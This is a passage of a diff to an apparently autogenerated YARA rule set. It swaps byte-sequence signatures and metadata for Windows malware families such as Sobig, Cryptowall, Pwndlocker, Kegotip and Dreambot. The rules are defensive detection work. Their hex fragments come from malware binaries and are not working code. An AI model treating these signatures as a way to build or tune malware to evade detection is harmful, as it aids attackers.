+		$sequence_6 = { 56 8b30 57 8b7d08 6a05 }
+		$sequence_7 = { 33d2 8d443018 663b5606 7342 }
+		$sequence_8 = { 50 e8???????? 8b7d08 81c700080000 b980000000 }
+		$sequence_9 = { c745f4d2070100 895dec ff15???????? 53 6a01 53 }
 
 	condition:
-		7 of them and filesize < 11198464
+		7 of them and filesize < 70912
 }
-rule MALPEDIA_Win_Deadwood_Auto : FILE
+rule MALPEDIA_Win_Transbox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e299ec52-8e21-507f-ba5a-e3a893abbf1e"
+		id = "974af1a4-da2b-5193-ac3c-32d4a6cfff60"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deadwood_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.transbox_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "27f6d744e976a1cbd8fe2392486788cf865733377db2356449d61f5e2be3b703"
+		logic_hash = "e0417344b856e4de18adbd11a563963b1ed47459f0027440ad36de04e1848468"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115639,32 +115853,32 @@ rule MALPEDIA_Win_Deadwood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 720d 8b4c246c 51 e8???????? 83c404 c68424c000000002 39742460 }
-		$sequence_1 = { 8964244c 6aff 56 8d442478 33d2 895914 897110 }
-		$sequence_2 = { 80780400 7409 8b00 50 ff15???????? c3 8b4808 }
-		$sequence_3 = { 33c0 8d0c5e 668944241c bf07000000 8bc1 897c2430 c744242c00000000 }
-		$sequence_4 = { 8b4608 2b06 c1f803 3bc1 734e 53 57 }
-		$sequence_5 = { ff15???????? 6804010000 8d8df4fdffff 51 50 ff15???????? 33d2 }
-		$sequence_6 = { 33c1 a9ff070000 0f94c3 84db 7430 a900008000 740c }
-		$sequence_7 = { 6689955cffffff 39bd54ffffff 720f 8b8540ffffff 50 e8???????? 83c404 }
-		$sequence_8 = { 8b4204 8d48f8 57 56 c744242402000000 894c301c e8???????? }
-		$sequence_9 = { c7411407000000 c7411000000000 89a5d8feffff 668911 8d7802 668b10 83c002 }
+		$sequence_0 = { e8???????? 8bda 8bf1 ff15???????? 898520fbffff 85f6 741a }
+		$sequence_1 = { 33c9 83c414 85c0 0f9fc1 8bc1 8b4dfc 33cd }
+		$sequence_2 = { 898738010000 85c0 745d 8d856cffffff 50 53 }
+		$sequence_3 = { 8bbdb0fdffff 8bc7 8bb5acfdffff 2bc6 99 f7f9 85c0 }
+		$sequence_4 = { 8b35???????? 85c0 740c 6a04 56 50 }
+		$sequence_5 = { 50 8d8db8fdffff e8???????? 50 8d8d7cfdffff e8???????? }
+		$sequence_6 = { 888178c60110 41 84c0 75f1 }
+		$sequence_7 = { e8???????? 57 8d95d0fdffff 8d8db8fdffff e8???????? c645fc0a c70424???????? }
+		$sequence_8 = { 83c430 8d4dd0 e8???????? 33ff be???????? 47 8bce }
+		$sequence_9 = { 740c 6a04 56 50 e8???????? 83c40c 8325????????00 }
 
 	condition:
-		7 of them and filesize < 1055744
+		7 of them and filesize < 288768
 }
-rule MALPEDIA_Win_Interception_Auto : FILE
+rule MALPEDIA_Win_Sobig_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf"
+		id = "1db89ea4-c7b4-580a-8658-7872983b45bd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.interception_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sobig_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f"
+		logic_hash = "703647dd78e5c80dff25867b8b892bf4ae4d1517eb9d703a33dee66b43a14d30"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115678,34 +115892,34 @@ rule MALPEDIA_Win_Interception_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 }
-		$sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 }
-		$sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 }
-		$sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
-		$sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 }
-		$sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 }
-		$sequence_6 = { f683c19c001004 7406 8816 46 }
-		$sequence_7 = { 8d542434 f3ab 66ab aa }
-		$sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 }
-		$sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 }
+		$sequence_0 = { e8???????? 6a01 8d4db8 e8???????? 83c8ff e9???????? 6a30 }
+		$sequence_1 = { ff750c 8d4dbc e8???????? 6a01 8d7e20 5b }
+		$sequence_2 = { 83650800 c7451008000000 0fb6450f 32d2 }
+		$sequence_3 = { e8???????? 8bf8 ff7614 8d4d90 c645fc04 e8???????? }
+		$sequence_4 = { 5e 8a1408 80faff 8811 7401 47 }
+		$sequence_5 = { 8b4630 6a01 8985e4feffff 58 53 8d8de0feffff 53 }
+		$sequence_6 = { 8d45bc 50 8bcf 895dfc e8???????? 83780800 0f94c0 }
+		$sequence_7 = { 3bc8 0f8496000000 8bd9 8d4de8 }
+		$sequence_8 = { 68???????? 6801000080 8d4d08 e8???????? 8b45ec c7451094624100 }
+		$sequence_9 = { 8a1f 47 83f80b 0f8777020000 ff2485563b4100 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Smominru_Auto : FILE
+rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c1a10c0a-1a81-5633-ba39-5fbcedc45f65"
+		id = "0ac13ffc-60b5-57b4-bdac-0ba216f69178"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smominru_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyglot_ransom_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "e46f6fcc506b8533ee7578778771fd23a12eff0b58e9a48260ec14f4febd7c2f"
+		logic_hash = "207fa5f26622dfd1aef2c3f100c53d4dd46542c0aab03454309445c1893ebb78"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115717,32 +115931,32 @@ rule MALPEDIA_Win_Smominru_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745fcfeffffff e8???????? 8b45cc e8???????? }
-		$sequence_1 = { ff15???????? 85c0 0f8d76d9b07b 50 e8???????? 33c0 c9 }
-		$sequence_2 = { 8b45bc 03c7 3bc7 0f828e47ab7b 3bd8 0f878647ab7b }
-		$sequence_3 = { 8d7f00 55 54 5d 56 57 }
-		$sequence_4 = { 8b55c8 3bd6 0f858017ac7b 8b5dd4 }
-		$sequence_5 = { 0f85514ac17b 53 33db f6464801 0f85884ac17b }
-		$sequence_6 = { 8b85f0fdffff 894620 8bc3 5b 8b4dfc 33cd }
-		$sequence_7 = { 0f844a4ac17b 3bc3 0f846d4ac17b 8a4807 }
-		$sequence_8 = { 8d43f8 80780705 0f848992c17b f640073f }
-		$sequence_9 = { 85f6 0f84173ea97b 6a00 56 e8???????? 85c0 0f8412b5ac7b }
+		$sequence_0 = { b020 d0bdd0b5d0bc 20d1 81d0bbd0b5d0 b4d1 83d18e }
+		$sequence_1 = { d0bed0b3d180 d0b0d0bcd0bc d1832e0d0a3c 61 20636c 61 7373 }
+		$sequence_2 = { 334218 0fb655f5 8945f0 8b45f8 c1e810 23c6 8945e4 }
+		$sequence_3 = { 3bf3 8b3f 7437 395e44 7532 83ff1f 742d }
+		$sequence_4 = { 8806 46 47 803f00 75ab 5f c60600 }
+		$sequence_5 = { 74b2 39750c 7514 8db364ffffff 8d7dd4 a5 a5 }
+		$sequence_6 = { 53 6880000000 6a02 53 6a02 6800000040 8d8500f0ffff }
+		$sequence_7 = { 81c634ffffff 8d4dec e8???????? 8b4620 834dfcff 39706c 7514 }
+		$sequence_8 = { 3e51 7565 7374 65206973 7472 757a 696f6e6920736f }
+		$sequence_9 = { 8bec 83ec20 56 ff7514 8d45e0 50 8bf1 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 1392640
 }
-rule MALPEDIA_Win_Clambling_Auto : FILE
+rule MALPEDIA_Win_Pwndlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e480c0cb-e19c-5e93-97bb-00caac1a9f2e"
+		id = "276b9929-07b6-5961-91ba-ea8cd06bb086"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.clambling_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pwndlocker_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "f3f0a4943735cbe1e2ffa9646f9d73cc0975851d00f58a2bf60f2536a8d04784"
+		logic_hash = "32e46025ac999bee5e5546895b079eecc269f28102bbbcf16da2fe4d978f576c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115756,32 +115970,32 @@ rule MALPEDIA_Win_Clambling_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b910000000 ff15???????? 66448bd8 41c1eb0b 4180e310 4180cb2f e9???????? }
-		$sequence_1 = { ba04010000 ff15???????? 83f8ff 7508 ff15???????? }
-		$sequence_2 = { b940000000 ff15???????? 448b8c24a0000000 488b8c24b0000000 }
-		$sequence_3 = { 56 57 4154 4155 4883ec68 4533ed }
-		$sequence_4 = { 8bd8 488b8c24a8010000 ff15???????? eb08 ff15???????? }
-		$sequence_5 = { 7448 4c8d442434 488bd7 33c9 ff15???????? }
-		$sequence_6 = { 750b ff15???????? e9???????? 0fbfeb }
-		$sequence_7 = { ffc7 4503e7 3bfd 7ce0 668b5c2430 }
-		$sequence_8 = { 488b8c24a8010000 ff15???????? 8907 eb08 ff15???????? 8bd8 488b8c24a8010000 }
-		$sequence_9 = { 8bf1 894c2438 6683c303 6681e3fcff }
+		$sequence_0 = { 75e0 5a 8b7224 01de 31c0 668b044e 8b721c }
+		$sequence_1 = { 8b4e18 8b5620 01da 56 e334 49 8d348a }
+		$sequence_2 = { e334 49 8d348a 8b36 }
+		$sequence_3 = { ebf4 3b7df0 75e0 5a 8b7224 }
+		$sequence_4 = { 8d348a 8b36 01de 31ff 31c0 fc }
+		$sequence_5 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a }
+		$sequence_6 = { 7407 c1cf0d 01c7 ebf4 3b7df0 75e0 }
+		$sequence_7 = { fc ac 84c0 7407 c1cf0d 01c7 ebf4 }
+		$sequence_8 = { fc ac 84c0 7407 c1cf0d 01c7 }
+		$sequence_9 = { 8b7224 01de 31c0 668b044e }
 
 	condition:
-		7 of them and filesize < 412672
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Silon_Auto : FILE
+rule MALPEDIA_Win_Kegotip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79ca4e66-80c4-54d1-ad2d-bb8c124436f4"
+		id = "600762c6-ac4d-5eb5-bbbf-0bef37409a30"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silon_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kegotip_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "874421a098d05c259305f60b2d95c6c3b7ec16195697a960df4680d8169470c0"
+		logic_hash = "6330aef57e16076515b4a4781ca5f76d2c7b12c38d9df7aca1927a38f8ab1a7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115795,34 +116009,34 @@ rule MALPEDIA_Win_Silon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a03 68???????? 8b5508 8b4204 50 }
-		$sequence_1 = { 83c114 898d00efffff 8b9500efffff 0fb6420d }
-		$sequence_2 = { 83ec14 c745ec00000000 c745fc00000000 6804010000 68???????? }
-		$sequence_3 = { 7418 8b5508 8b8264080000 8b4d08 8b9160080000 899060080000 8b4508 }
-		$sequence_4 = { 0f8512010000 8b85ecfeffff 83c001 8985e4feffff }
-		$sequence_5 = { 8985c4fdffff 8b8dc4fdffff 51 e8???????? }
-		$sequence_6 = { 6a00 6a02 8b4ddc 51 8b55d8 52 e8???????? }
-		$sequence_7 = { 894dec 8b55ec 3b55e8 732e 8b45f0 50 8b4dec }
-		$sequence_8 = { 8b0d???????? 51 68???????? e8???????? 83c410 c78500feffff00000000 8b9504feffff }
-		$sequence_9 = { 8b4dfc 8b9058080000 2b915c080000 8b450c 395018 }
+		$sequence_0 = { 68???????? 6801000080 ff15???????? 8985ecfeffff }
+		$sequence_1 = { 0fbe940dd6feffff 83fa5c 750e 8b85d4feffff c68405d6feffff00 8d8dd8feffff }
+		$sequence_2 = { 3b4514 7304 33c0 eb58 c745fc00000000 c745f800000000 }
+		$sequence_3 = { 52 ff15???????? 83bd6cfeffff00 7502 eb36 8b8560feffff }
+		$sequence_4 = { 898da8feffff 8995acfeffff 8b85acfeffff 3b45fc 7214 770b 8b8da8feffff }
+		$sequence_5 = { ff15???????? 83f803 7402 ebc2 6a00 6a04 8b45dc }
+		$sequence_6 = { 7412 0fbe4508 83f823 7409 c745fc00000000 eb07 }
+		$sequence_7 = { 32c0 e9???????? 8d85d8feffff 50 6804010000 ff15???????? }
+		$sequence_8 = { ff15???????? c645ff01 8b45f0 50 ff15???????? }
+		$sequence_9 = { c745f400000000 6a00 8d55f4 52 6a00 6a00 6a01 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 278528
 }
-rule MALPEDIA_Win_Reactorbot_Auto : FILE
+rule MALPEDIA_Win_Dreambot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a4f3c70a-5bf3-5f9e-9dd8-eacb62aa112d"
+		id = "ca125658-e0a0-53ce-a980-872204f0b2dd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.reactorbot_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dreambot_auto.yar#L1-L1010"
 		license_url = "N/A"
-		logic_hash = "577d7a26f158c3905b8b827065bc6c12a25adcae231dbaf0bdeb91e6773e1cc2"
+		logic_hash = "376288f0c1af3049ba5a8f21b0bc3eb4e04085f83d0b86e461c7b5d308181cec"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -115834,38 +116048,141 @@ rule MALPEDIA_Win_Reactorbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? c705????????00000000 c705????????01000000 5d c3 }
-		$sequence_1 = { 52 e8???????? 8d85bcfdffff 50 6804010000 8d8d88fbffff }
-		$sequence_2 = { 8d4de8 51 ff15???????? 8945f8 }
-		$sequence_3 = { 894dfc 8b55fc a1???????? 8982b8000000 }
-		$sequence_4 = { 51 ff15???????? c745f801000000 8b45f8 }
-		$sequence_5 = { 51 ff15???????? 8945fc 837dfc00 7479 }
-		$sequence_6 = { 50 ff15???????? 83c408 c745f401000000 8b45f4 }
-		$sequence_7 = { 6804010000 8d8d80f9ffff 51 e8???????? }
-		$sequence_8 = { 6bc005 83e803 99 b999000000 }
-		$sequence_9 = { 83c005 99 b905000000 f7f9 }
-		$sequence_10 = { ff15???????? e8???????? 833d????????00 7509 833d????????00 }
-		$sequence_11 = { 69c0b13a0200 99 83e203 03c2 }
-		$sequence_12 = { 7402 eb0c c705????????b80b0000 eb0a c705????????e8030000 }
-		$sequence_13 = { 83e101 f7d9 81e12083b8ed 33c1 }
-		$sequence_14 = { ba2f000000 488d4c2440 ff15???????? 4889442420 48837c242000 }
-		$sequence_15 = { 488b442468 813850450000 0f859f030000 488b442468 4883c018 }
+		$sequence_0 = { ff35???????? ffd6 897b20 6a00 }
+		$sequence_1 = { ffd6 8b44240c 894320 68???????? ff7320 }
+		$sequence_2 = { 50 ff7320 56 ff5710 8b16 }
+		$sequence_3 = { e8???????? 8b7d0c eb02 33c0 8b4f30 83e140 0b4b18 }
+		$sequence_4 = { c7473000000000 e9???????? 834f3001 8b4720 }
+		$sequence_5 = { 8b471c 8b08 81f948545450 740c 81f9504f5354 }
+		$sequence_6 = { 8b4734 e8???????? 85c0 751a }
+		$sequence_7 = { 7475 8b4618 e8???????? 8bf8 85ff 7547 }
+		$sequence_8 = { 3bf3 7474 395d0c 746f }
+		$sequence_9 = { 53 68???????? eb54 3bf3 745c }
+		$sequence_10 = { 0f84b7000000 395d0c 0f84ae000000 6a01 ff750c 56 }
+		$sequence_11 = { 3bf3 0f8481000000 395d0c 747c 6a03 }
+		$sequence_12 = { 68???????? e8???????? 894508 8b7d08 eb24 }
+		$sequence_13 = { 85c0 7520 3bf3 741c }
+		$sequence_14 = { 837d0c04 7516 ff7510 ff36 68???????? }
+		$sequence_15 = { 0f8496000000 395d0c 0f848d000000 6a07 ebdd 3bf3 }
+		$sequence_16 = { 4803542460 41ff5220 4c8b442460 e9???????? }
+		$sequence_17 = { 488b9424a8000000 4533c9 4533c0 ff5028 }
+		$sequence_18 = { eb2c 8b05???????? 413bc5 7528 493bfd 7423 41b904000000 }
+		$sequence_19 = { 418d5620 498bcf ff15???????? 4c8bf0 }
+		$sequence_20 = { 4533f6 488b0b 2580000000 418d5620 }
+		$sequence_21 = { 4c8b18 488b542460 4533c9 488bc8 }
+		$sequence_22 = { bb57000000 e8???????? 413bc5 7446 }
+		$sequence_23 = { 498bcb 492bd0 4803542460 41ff5220 }
+		$sequence_24 = { 0f84ac000000 41b807000000 ebd7 493bfd 0f849b000000 }
+		$sequence_25 = { ebbd 493bfd 0f8481000000 413bf5 747c }
+		$sequence_26 = { 493bfd 0f84d9000000 413bf5 0f84d0000000 }
+		$sequence_27 = { 493bfd 0f84b5000000 413bf5 0f84ac000000 }
+		$sequence_28 = { e8???????? e9???????? 493bfd 0f84b5000000 }
+		$sequence_29 = { 493bfd 0f849b000000 413bf5 0f8492000000 }
+		$sequence_30 = { 5f c3 4053 4883ec20 4c8b4108 488bd9 }
+		$sequence_31 = { 4c896c2420 e8???????? 4c8b442468 488b0d???????? }
+		$sequence_32 = { e8???????? 4c8b1d???????? ba0d000000 41834b3401 }
+		$sequence_33 = { 33d2 89442448 ff15???????? 33d2 }
+		$sequence_34 = { 3decc7eea6 0f84e8000000 3d0470a8c4 0f8486000000 }
+		$sequence_35 = { 415c 5f c3 bb01000000 e9???????? }
+		$sequence_36 = { ff15???????? 4883f8ff 488bf8 7445 488d842488000000 }
+		$sequence_37 = { 4821742428 4c8d8424c8000000 488d542428 488d4c2450 4533c9 e8???????? }
+		$sequence_38 = { 33d2 ff15???????? 4821742428 4c8d8424c8000000 }
+		$sequence_39 = { 33d2 3bc2 0f85bd000000 33c0 89942498000000 }
+		$sequence_40 = { e8???????? f7d0 eb07 8b8424c8000000 3dcad2b74e }
+		$sequence_41 = { 33f6 46 8945f8 85c0 }
+		$sequence_42 = { 817424105085b8ed 33ff 47 57 be???????? 56 8d542418 }
+		$sequence_43 = { ff15???????? 8945fc 85c0 741a 6804010000 8d4f10 51 }
+		$sequence_44 = { 33c0 89942498000000 899424a8000000 8984249c000000 }
+		$sequence_45 = { ff75f4 81c65ff36e3c 89750c 8d750c e8???????? 8bf0 3bf3 }
+		$sequence_46 = { 0f86af030000 488b4a34 813948545450 740c 8139504f5354 }
+		$sequence_47 = { 895dfc e8???????? 8945f8 33ff }
+		$sequence_48 = { 4d8bc4 33d2 ff15???????? 488bf8 }
+		$sequence_49 = { 4883c104 4883c208 4983e801 75e4 8b442420 83f801 }
+		$sequence_50 = { c3 6a00 6800004000 6a00 ff15???????? a3???????? }
+		$sequence_51 = { ff33 50 6810040000 ff15???????? 8945fc }
+		$sequence_52 = { 8945f8 33ff eb03 8b750c ff75f8 69f60d661900 ff75f4 }
+		$sequence_53 = { 483bc3 488b4550 4c8bc3 410f94c1 33d2 4889442420 }
+		$sequence_54 = { 498be9 e8???????? 4885c0 488bf0 0f84a3000000 }
+		$sequence_55 = { 418b44241c 488d5e10 4533f6 488b0b }
+		$sequence_56 = { 488b572c 4533c9 448bc0 498bcd ff5320 }
+		$sequence_57 = { 8db4083089b9ed 57 8d45f4 50 8b450c }
+		$sequence_58 = { 57 4883ec20 8b05???????? 8364243800 }
+		$sequence_59 = { 8945f8 85c0 7551 ff33 50 }
+		$sequence_60 = { 4c8d8424d0000000 48c7c101000080 ff15???????? 85c0 7568 4c8d8c24d0000000 }
+		$sequence_61 = { e8???????? 85c0 0f84fafcffff 4533c9 }
+		$sequence_62 = { 50 ff7310 ff15???????? 33d2 89b7184a0000 }
+		$sequence_63 = { 8d4508 50 56 e8???????? 59 59 8945f0 }
+		$sequence_64 = { e8???????? 8945ec 3bc3 0f84ad010000 53 8d4de4 51 }
+		$sequence_65 = { ff15???????? eb22 ff7518 ff7514 }
+		$sequence_66 = { 4885c9 7405 e8???????? 4883c428 c3 4053 }
+		$sequence_67 = { 0f86ea000000 8b4508 8d843800ffffff 50 }
+		$sequence_68 = { 493bc5 742f 488d4810 ff15???????? }
+		$sequence_69 = { 4c8bc6 ff15???????? 488bd8 493bc7 }
+		$sequence_70 = { a1???????? 35b1492a9d 50 8bd6 e8???????? eb02 33c0 }
+		$sequence_71 = { 8b45fc 0fb700 8bc8 81e100f00000 }
+		$sequence_72 = { 33c0 e8???????? 33c9 41 85c0 }
+		$sequence_73 = { 8be5 5d c20400 8325????????00 6a00 68???????? }
+		$sequence_74 = { 85c0 7505 6a08 58 eb69 ff15???????? }
+		$sequence_75 = { 740e 44893d???????? 44893d???????? 488d442440 4c8d4c2440 4c8d442440 }
+		$sequence_76 = { 4d3bef 7415 498bd5 4883c9ff ff15???????? 8bc8 }
+		$sequence_77 = { 8945f0 ff15???????? 83c068 50 e8???????? 8bf0 8975f4 }
+		$sequence_78 = { c9 c20800 55 8bec 81ec1c010000 8d4807 83e1f8 }
+		$sequence_79 = { ffb72c080000 e8???????? 5e 5d 5b c3 eb10 }
+		$sequence_80 = { 488bf0 eb34 488d0595d6ffff 4885c0 }
+		$sequence_81 = { 488b15???????? 4c8d442468 48c7c101000080 ff15???????? }
+		$sequence_82 = { a1???????? 83c01e 50 ff15???????? a1???????? 33c9 }
+		$sequence_83 = { e8???????? 488b0d???????? 448be0 f0834156ff 85c0 }
+		$sequence_84 = { 3a4704 7206 57 e8???????? a1???????? 83c01e 50 }
+		$sequence_85 = { 7505 8d5857 eb15 488b05???????? 89702a 48897d00 eb17 }
+		$sequence_86 = { 83839c000000ff 397818 0f852ffcffff 33c0 }
+		$sequence_87 = { 488b0d???????? 488bfa 4883c12e ff15???????? eb0b }
+		$sequence_88 = { 83c01e 50 ffd6 a1???????? }
+		$sequence_89 = { 8d4604 66d3e0 66098310170000 8d4103 }
+		$sequence_90 = { 8be5 5d c3 0fb708 6683f902 751c }
+		$sequence_91 = { 83a78c00000000 33c0 c3 51 e8???????? }
+		$sequence_92 = { 8b9314170000 83432801 b910000000 8d42f3 2aca }
+		$sequence_93 = { 83c136 83caff f00fc111 33f6 }
+		$sequence_94 = { e8???????? 488b0d???????? 4883c12e ff15???????? }
+		$sequence_95 = { 4c8b1d???????? 418b4356 85c0 75e6 }
+		$sequence_96 = { a1???????? 8b4c2404 8908 83c01e 50 ff15???????? }
+		$sequence_97 = { 8975f4 ffd7 8b1d???????? 6a3a }
+		$sequence_98 = { 0f8495000000 8b3d???????? 6aff 68806967ff 56 ff35???????? e8???????? }
+		$sequence_99 = { a1???????? 83c036 83c9ff f00fc108 85db 0f8425010000 68???????? }
+		$sequence_100 = { c3 33c0 483bc8 7458 488b5128 483bd0 }
+		$sequence_101 = { e9???????? 83f916 0f8fa7080000 0f8415080000 }
+		$sequence_102 = { e9???????? 83e908 74eb 2bcb 0f84fa000000 2bcb }
+		$sequence_103 = { 33d2 e8???????? 44892d???????? 33c9 44892d???????? e8???????? 488bcf }
+		$sequence_104 = { 66b90100 4889442420 e8???????? 3bc3 0f859b000000 }
+		$sequence_105 = { 5e 5b c20800 51 53 57 6884000000 }
+		$sequence_106 = { 8b442404 56 e8???????? 884604 a1???????? 83c01e 50 }
+		$sequence_107 = { 4883c12e ff15???????? 448b05???????? 488bd3 b92ab5f293 e8???????? 4885c0 }
+		$sequence_108 = { e8???????? 8945f8 85c0 0f851c050000 ff7508 }
+		$sequence_109 = { 33d2 85c0 7c12 8d0c950875be03 8b39 42 3bd0 }
+		$sequence_110 = { 8bd8 3bde 0f8559020000 e8???????? 6a18 }
+		$sequence_111 = { 0f851a020000 8b442460 3bc3 7414 8b483c 66f74401160020 7408 }
+		$sequence_112 = { 46 33048d1062be03 85ff 75cf f7d0 eb02 33c0 }
+		$sequence_113 = { 8945fc ff15???????? eb26 c745fc08000000 eb1d }
+		$sequence_114 = { 0f859d010000 e8???????? 85c0 0f849d010000 395c244c 7407 }
+		$sequence_115 = { 46 9f 64637810 705d 3d0e643f6e b974ef18f3 61 }
+		$sequence_116 = { 56 57 35fa446809 33ff 57 50 }
+		$sequence_117 = { ff75f8 56 ff15???????? 6a01 }
+		$sequence_118 = { 7420 56 ff7508 8d45e8 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 802816
 }
-rule MALPEDIA_Win_Tonedeaf_Auto : FILE
+rule MALPEDIA_Win_Cryptowall_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15deba33-5fb4-592a-90c3-bca364871ec1"
+		id = "0b206dc1-5d58-50e7-8b0b-4a1659e8c327"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tonedeaf_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptowall_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "7f00488f24cf89d345c0d8aa4f5fd46f86ca2b90c3b462b66a07f10b957268c4"
+		logic_hash = "ce5a2f67f32819e2223821b9858e69dbea24618850279ae1bc1fe9c840f1999e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115879,32 +116196,32 @@ rule MALPEDIA_Win_Tonedeaf_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 660fd645d4 33db 8945d8 895dd4 }
-		$sequence_1 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 }
-		$sequence_2 = { 33db 8945d8 895dd4 8945dc }
